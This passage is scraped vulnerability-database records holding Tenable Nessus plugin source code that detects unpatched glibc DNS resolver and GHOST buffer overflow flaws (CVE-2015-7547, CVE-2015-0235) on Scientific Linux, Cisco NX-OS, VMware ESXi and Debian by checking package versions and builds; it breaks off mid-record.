"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : glibc on SL6.x i386/x86_64 (20160216)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:glibc-headers", "p-cpe:/a:fermilab:scientific_linux:glibc-static", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:nscd", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20160216_GLIBC_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/88797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88797);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL6.x i386/x86_64 (20160216)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis update also fixes the following bugs :\n\n - The dynamic loader has been enhanced to allow the\n loading of more shared libraries that make use of static\n thread local storage. While static thread local storage\n is the fastest access mechanism it may also prevent the\n shared library from being loaded at all since the static\n storage space is a limited and shared process-global\n resource. Applications which would previously fail with\n 'dlopen: cannot load any more object with static TLS'\n should now start up correctly.\n\n - A bug in the POSIX realtime support would cause\n asynchronous I/O or certain timer API calls to fail and\n return errors in the presence of large thread-local\n storage data that exceeded PTHREAD_STACK_MIN in size\n (generally 16 KiB). The bug in librt has been corrected\n and the impacted APIs no longer return errors when large\n thread-local storage data is present in the application.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1602&L=scientific-linux-errata&F=&S=&P=15820\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28dbaa3a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"glibc-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-debuginfo-common-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-devel-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-headers-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-static-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"glibc-utils-2.12-1.166.el6_7.7\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"nscd-2.12-1.166.el6_7.7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-02T16:53:00", "description": "The version of Cisco NX-OS software running on the remote device is affected by a remote code execution vulnerability in the bundled version of the GNU C Library (glibc) due to a stack-based buffer overflow condition in the DNS resolver. An unauthenticated, remote attacker can exploit this, via a crafted DNS response that triggers a call to the getaddrinfo() function, to cause a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-14T00:00:00", "type": "nessus", "title": "Cisco Nexus 3000 / 9000 Series GNU C Library (glibc) getaddrinfo() RCE (cisco-sa-20160218-glibc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-CSCUY36553-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/93480", "sourceData": "#TRUSTED 50ce4eb53ff5f515ec275c08486326604ef7358f4f4a34abeaaf978df8e1fd980cb11f777e031d0e656f2d476490e1e21d822ab12a798462571a1918efeb4872c7ccc4d55173ced5fcd0c6d19f5cdeac551a5af1d5a70f3ce4781cb7985a8df78ac7ff6916fd258deca5a75f8a0795b8bf507a92cc326d65680f744fef2a5da574b7d3c8081d0213d795a2bc84d63b2c7b24bc006a9ea886ead8687e35105b3439577b658aea11378f6b797835f0b72667d36eafbe9147e2b060963e841713775e940d09ebb459738834017289d915b16e850983fd36f3bef6a98ebc8f6bc556a24c197d0a58bc2ed57ded0886221f18075fec2aeefe5425e754da12272c50d9df9c92185b3349c95fc6dbf15972ed67004c08eeac738fe72b14bd280692a86c7000f38e7fb5afbbc3c8b5c8770530ce26049cb4a111ea3661fc262e057255737170863491a272fde85ca2686de2883f9cf93be8c2d0061ac4beb69342af874badb5883089628b394da2d00ed413dc479aa71bfe8ea66e543d85b6f96c276349710799e235f1c1f5ee633257933d2b564e35cda22ef99a93510a47217996dacd7ae61512ec574c03232ef400e2aacfb04e122844df4701190ff680eb663d98498eb804d58cd12ebb6bed63e84cc47ddcf28b24def28a5ed1fe69552ede9ae2b2822fc6a66c79210eff5efc66992570c6a28b328495f796f8ed334c01e5be7c24\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93480);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20160218-glibc\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuy36553\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuy38921\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n script_xref(name:\"EDB-ID\", value:\"40339\");\n script_xref(name:\"CERT\", value:\"457759\");\n\n script_name(english:\"Cisco Nexus 3000 / 9000 Series GNU C Library (glibc) getaddrinfo() RCE (cisco-sa-20160218-glibc)\");\n script_summary(english:\"Checks the NX-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco NX-OS software running on the remote device is\naffected by a remote code execution vulnerability in the bundled\nversion of the GNU C Library (glibc) due to a stack-based buffer\noverflow condition in the DNS resolver. An unauthenticated, remote\nattacker can exploit this, via a crafted DNS response that triggers a\ncall to the getaddrinfo() function, to cause a denial of service\ncondition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160218-glibc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae76a668\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCuy36553\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCuy38921\");\n # https://security.googleblog.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?94dd3376\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version or install the relevant \nSMU patches referenced in Cisco bug ID CSCuy36553 / CSCuy38921.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\n\n# only affects nexus 9000 series systems\n# and the 3000 series systems listed in the advisory/bugs\nif (\n device != 'Nexus' || \n model !~ '^(3016|3048|3064|3132|3164|3172|3232|3264|31128|[9][0-9][0-9][0-9][0-9]?)([^0-9]|$)'\n ) audit(AUDIT_HOST_NOT, \"affected\");\n\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\n\noverride = 0;\ncheck_patch = 0;\nvuln = 0;\n\nif ((\n # Only CSCuy36553\n version =~ \"^6\\.1\" ||\n version =~ \"^7\\.0\\(3\\)I1\"\n ) && model =~ '^(3164|3232|3264|31128|9[0-9][0-9][0-9][0-9]?)([^0-9]|$)'\n) vuln ++;\n# CSCuy36553 & CSCuy38921\nelse if (\n version =~ \"^7\\.0\\(3\\)I2\\(1[a-z]?\\)\" ||\n version == \"7.0(3)I2(2)\" ||\n version == \"7.0(3)I3(1)\"\n) vuln ++;\nelse if ( version == \"7.0(3)I2(2a)\" || version == \"7.0(3)I2(2b)\" ) \n{\n # flag vuln in case we can't check for the patch.\n vuln ++;\n check_patch ++;\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n\n# check for the patch on 7.0(3)I2(2[ab])\n# audit if patched, assume vuln otherwise\nif (check_patch && get_kb_item(\"Host/local_checks_enabled\"))\n{\n buf = cisco_command_kb_item(\"Host/Cisco/Config/show_install_active\", \"show install active\");\n if (check_cisco_result(buf))\n {\n # Modular products 2a - 2 patches\n # nxos.CSCuy36553_modular_sup-1.0.0-7.0.3.I2.2a.lib32_n9000\n # nxos.CSCuy36553_modular_lc-1.0.0-7.0.3.I2.2a.lib32_n9000\n if ( version == \"7.0(3)I2(2a)\" && model =~ \"^(9504|9508|9516)\")\n {\n if \n ( \n \"CSCuy36553_modular_sup\" >< buf && \n \"CSCuy36553_modular_lc\" >< buf\n ) \n audit(AUDIT_HOST_NOT, \"affected because CSCuy36553 patches are installed\");\n }\n # ToR products 2a - 1 patch\n # nxos.CSCuy36553_TOR-1.0.0-7.0.3.I2.2a.lib32_n9000\n else if (version == \"7.0(3)I2(2a)\")\n {\n if (\"CSCuy36553_TOR\" >< buf) audit(AUDIT_HOST_NOT, \"affected because CSCuy36553 patch is installed\");\n }\n # All products 2b - 2 patches\n # nxos.CSCpatch01-1.0.0-7.0.3.I2.2b.lib32_n9000\n # nxos.CSCuy36553-1.0.0-7.0.3.I2.2b.lib32_n9000\n else if ( version == \"7.0(3)I2(2b)\")\n {\n if \n ( \n \"CSCpatch01\" >< buf && \n \"CSCuy36553\" >< buf\n ) \n audit(AUDIT_HOST_NOT, \"affected because CSCuy36553 patches are installed\");\n }\n \n }\n else if (cisco_needs_enable(buf)) override = TRUE;\n}\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Model : ' + device + ' ' + model +\n '\\n Installed version : ' + version +\n '\\n Fix : see solution.' +\n '\\n';\n security_warning(port:0, extra:report + cisco_caveat(override));\n }\n else security_warning(port:0, extra:cisco_caveat(override));\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T20:20:11", "description": "The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0 prior to build 3568940. It is, therefore, affected by a stack-based buffer overflow condition in the GNU C Library (glibc) DNS client-side resolver due to improper validation of user-supplied input when looking up names via the getaddrinfo() function. An attacker can exploit this to execute arbitrary code by using an attacker-controlled domain name, an attacker-controlled DNS server, or through a man-in-the-middle attack.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-23T00:00:00", "type": "nessus", "title": "ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2016-0002_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/88906", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88906);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_bugtraq_id(83265);\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n script_xref(name:\"CERT\", value:\"457759\");\n script_xref(name:\"EDB-ID\", value:\"39454\");\n\n script_name(english:\"ESXi 5.5 < Build 3568722 / 6.0 < Build 3568940 glibc DNS Resolver RCE (VMSA-2016-0002) (remote check)\");\n script_summary(english:\"Checks the ESXi version and build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESXi host is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESXi host is 5.5 prior to build 3568722 or 6.0\nprior to build 3568940. It is, therefore, affected by a stack-based\nbuffer overflow condition in the GNU C Library (glibc) DNS client-side\nresolver due to improper validation of user-supplied input when\nlooking up names via the getaddrinfo() function. An attacker can\nexploit this to execute arbitrary code by using an attacker-controlled\ndomain name, an attacker-controlled DNS server, or through a\nman-in-the-middle attack.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2016-0002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144353\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144357\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144057\");\n script_set_attribute(attribute:\"see_also\", value:\"http://kb.vmware.com/kb/2144054\");\n # https://googleonlinesecurity.blogspot.com/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8bdae0a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://sourceware.org/bugzilla/show_bug.cgi?id=18665\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch as referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfixes = make_array(\n '5.5', '3568722',\n '6.0', '3568940'\n );\n\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\n\nif (\"ESXi\" >!< rel) audit(AUDIT_OS_NOT, \"ESXi\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\n\n# Lets extract the ESXi version\nver = ereg_replace(pattern:\"^ESXi? ([0-9]+\\.[0-9]+).*$\", replace:\"\\1\", string:ver);\n\nif (\n ver !~ '^5\\\\.5($|[^0-9])' &&\n ver !~ '^6\\\\.0($|[^0-9])'\n) audit(AUDIT_OS_NOT, \"ESXi 5.5 / 6.0\");\n\nfixed_build = fixes[ver];\n\n# We should never ever trigger this\nif (empty_or_null(fixed_build)) audit(AUDIT_VER_FORMAT, ver);\n\nmatch = eregmatch(pattern:'^VMware ESXi.*build-([0-9]+)$', string:rel);\nif (isnull(match)) audit(AUDIT_UNKNOWN_BUILD, \"VMware ESXi\", \"5.5 / 6.0\");\n\nbuild = int(match[1]);\n\nif (build < fixed_build)\n{\n report = '\\n ESXi version : ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fixed_build +\n '\\n';\n\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESXi \", ver + \" build \" + build);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-11T01:40:07", "description": "A vulnerability has been fixed in eglibc, Debian's version of the GNU C library :\n\nCVE-2015-0235\n\nQualys discovered that the gethostbyname and gethostbyname2 functions were subject to a buffer overflow if provided with a crafted IP address argument. This could be used by an attacker to execute arbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have already been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-139-1 : eglibc security update (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:eglibc-source", "p-cpe:/a:debian:debian_linux:glibc-doc", "p-cpe:/a:debian:debian_linux:libc-bin", "p-cpe:/a:debian:debian_linux:libc-dev-bin", "p-cpe:/a:debian:debian_linux:libc6", "p-cpe:/a:debian:debian_linux:libc6-amd64", "p-cpe:/a:debian:debian_linux:libc6-dbg", "p-cpe:/a:debian:debian_linux:libc6-dev", "p-cpe:/a:debian:debian_linux:libc6-dev-amd64", "p-cpe:/a:debian:debian_linux:libc6-dev-i386", "p-cpe:/a:debian:debian_linux:libc6-i386", "p-cpe:/a:debian:debian_linux:libc6-i686", "p-cpe:/a:debian:debian_linux:libc6-pic", "p-cpe:/a:debian:debian_linux:libc6-prof", "p-cpe:/a:debian:debian_linux:libc6-udeb", "p-cpe:/a:debian:debian_linux:libc6-xen", "p-cpe:/a:debian:debian_linux:libnss-dns-udeb", "p-cpe:/a:debian:debian_linux:libnss-files-udeb", "p-cpe:/a:debian:debian_linux:locales", "p-cpe:/a:debian:debian_linux:locales-all", "p-cpe:/a:debian:debian_linux:nscd", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-139.NASL", "href": "https://www.tenable.com/plugins/nessus/82122", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-139-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82122);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"Debian DLA-139-1 : eglibc security update (GHOST)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability has been fixed in eglibc, Debian's version of the GNU\nC library :\n\nCVE-2015-0235\n\nQualys discovered that the gethostbyname and gethostbyname2 functions\nwere subject to a buffer overflow if provided with a crafted IP\naddress argument. This could be used by an attacker to execute\narbitrary code in processes which called the affected functions.\n\nThe original glibc bug was reported by Peter Klotz.\n\nWe recommend that you upgrade your eglibc packages.\n\nThe other three CVEs fixed in Debian wheezy via DSA 3142-1 have\nalready been fixed in squeeze LTS via DLA DLA 97-1.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/01/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/eglibc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-udeb\");\n 